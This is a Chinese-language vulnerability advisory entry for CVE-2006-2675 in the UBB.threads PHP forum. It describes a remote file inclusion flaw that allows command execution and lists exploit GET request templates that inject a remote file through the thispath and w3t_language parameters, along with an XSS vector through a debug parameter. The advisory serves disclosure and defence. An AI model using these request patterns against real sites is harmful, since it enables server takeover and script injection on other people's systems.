添加时间:
2008-10-03

系统编号:
WAVDB-00952
BugCVE: CVE-2006-2675

影响版本:
UBBThreads >= 6.4.x

程序介绍:

UBB.threads是一款由PHP编写的WEB论坛应用程序，支持多种数据库系统，可使用在多种Unix和Linux操作系统下。

漏洞分析:

UBB.threads对用户请求的处理上存在输入验证漏洞，远程攻击者可能利用此漏洞注入PHP代码，在服务器上以Web进程权限执行任意命令。
UBB.threads的addpost_newpoll.php脚本没有对thispath变量值做充分的过滤检查，远程攻击者可能利用漏洞变星值插入“ http:// ”这样的远程引用字串，使服务器包含远程服务器上的PHP脚本代码进行执行，从而以Web进程权限在系统上执行任意命令。

漏洞利用:

ersion 6.x
GET ->
http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t
_language=[FILE]
 GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
 If php version < 4.1.0 or UBB version <= 5.x
GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
 XSS:
GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
 ---

解决方案:
厂商补丁：
Infopop
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.infopop.com/products/ubbthreads/index.html